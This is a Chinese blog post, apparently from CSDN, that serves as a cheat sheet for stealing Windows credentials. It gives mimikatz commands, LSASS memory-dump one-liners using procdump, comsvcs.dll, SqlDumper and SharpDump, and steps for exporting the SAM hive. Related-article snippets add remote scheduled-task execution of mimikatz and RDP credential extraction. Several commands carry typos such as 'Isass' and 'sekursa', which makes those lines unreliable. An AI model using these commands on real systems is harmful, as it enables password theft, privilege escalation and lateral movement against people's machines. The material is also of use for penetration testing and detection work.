密码抓取(mimikatz)

最新推荐文章于 2024-04-18 02:33:06 发布
最新推荐文章于 2024-04-18 02:33:06 发布
阅读量2.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44300286/article/details/110328864
版权

0x01、基本用法:

CRYPTO::Certificates -列出/导出凭证。

PRIVILEGE::Debug -获得Debug权限

SEKURLSA::LogonPasswords -列出所有可用的提供者的凭据

TOKEN:List -列出系统中的所有令牌。

TOKEN::Elevate -假冒令牌。用于提升权限至SYSTEM权限(默认情况下)

0x02、加载方法

msf

load mimikatz //加载mimikatz
wdigest	//列出所有可用的账号密码(与以下三个命令一样)
tspkg
msv
mimikatz_command -f sekursa::logonPasswords

cs

加载并运行mimikatz:Access——>run mimikatz	
抓取密码hash值:Access——>hashdump

0x03、hash抓取

QuarksPwDump

QuarksPwDump.exe -ump-hash-local

wce

wce.exe
wce.exe -W

pwdump7
LaZagne

laZagne_x86.exe windows

SharpDump

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq Isass.exe" /NH') do SharpDump.exe %i
mimikatz.exe"sekurlsa::minidump Isass.dmp" sekurlsal::logonPasswords full" "exit"

ProcDump

Procdump.exe -accepteula -ma Isass.exe Isass.dmp

sqldump

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq Isass.exe" /NH') do Sqldumper.exe %i 0 0x01100

rundll32

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq Isass.exe" /NH') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %i .\lsass.dmp full

关于SAM数据库

reg save hklm\sam .\sam.hive && save hklm\system .\system.hive
lsadump:sam /sam:sam.hiv /system:system.hiv
obsetear
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4384
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
密码抓取神器mimikatz
02-02
抓取整个windows系列的密码神器,必须在DOS命令提示符下以管理员身份运行;首先输入命令:privilege::debug 接着输入命令:sekurlsa::logonpasswords ,即可查看到相关信息
mimikatz抓取密码_mimikatz获取密码(1),复习指南
最新发布
m0_60452070的博客
04-18 427
schtasks /create /s 192.168.139.128 /ru “SYSTEM” /tn mimika /sc DAILY /tr C:\mimika.bat /F #系统大于等于windows2012 创建mimika对应执行文件。schtasks /run /s 192.168.139.128 /tn mimika /i #运行mimika任务。echo 回车复制执行mimikatz脚本到目标并执行,耐心等待。echo 回车复制减压脚本到目标并执行,耐心等待。
mimikatz获取系统密码
03-28
获取系统级别密码
内网渗透之内网信息收集(综合)
墨鱼菜鸡
09-10 488
目录 Metasploit内网信息收集 01msf反弹shell 02msf反弹shell 03通过shell关闭防火墙 04关闭杀毒软件 05打开并连接3389 06数据包抓取 07口令破解 普通用户提权 08other 09scraper 09winenum 10msf主机发现 11msf端口扫描 12服务扫描与查点 ...
横向知识总结
m0_48907714的博客
09-17 624
横向知识总结
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6227
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 1628
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
Windows密码抓取神器Mimikatz.zip
07-18
轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码!这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器可以提升进程权限 注入进程 读取进程内存等等下面展示一个 读取扫雷游戏的内存的例子我们...
Mimikatz Windows 密码抓取神器
05-27
Mimikatz Windows 密码抓取神器
一键获取windows密码神器mimikatz咪咪猫
07-23
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full""windows密码抓取神器
利用mimikatz查看rdp连接密码【渗透测试】
热门推荐
leeezp的博客
09-22 29万+
在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢?UserName就是账户,CredentialBlob 字段值是解密后的密码,如果是空,就尝试 Credentials 目录下其他凭据的值。(毕竟渗透也是个苦力活...)可以保存rdp凭据,ssh凭据等连接凭据。接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。
mimikatz抓取密码
G208_522的博客
10-26 4417
mimikatz抓取密码
mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 6854
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
内网渗透之某后渗透利用【网络安全】
kali_Ma的博客
03-23 3231
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码
使用mimikatz获取windows密码凭证
cuteyann的博客
05-17 1311
(如果出现以下报错:ERROR kuhl_m_privilege_simple;RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)下载地址:https://github.com/gentilkiwi/mimikatz/releases。1、开启mimikatz。工具:mimikatz
多种姿势抓取windows系统的hash
p_utao的博客
09-12 4598
hashdump抓取密码 从目标机中提取hash值,破解hash值就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
mimikatz常见命令
G3et的博客
01-29 1357
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
mimikatz查看win10密码
05-13
请注意,使用Mimikatz来获取未经授权的访问密码或尝试获取其他人的密码可能是非法的,这可能会导致法律后果。在此仅提供给安全研究人员或系统管理员进行安全审计和测试的参考。 以下是使用Mimikatz获取Win10密码的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值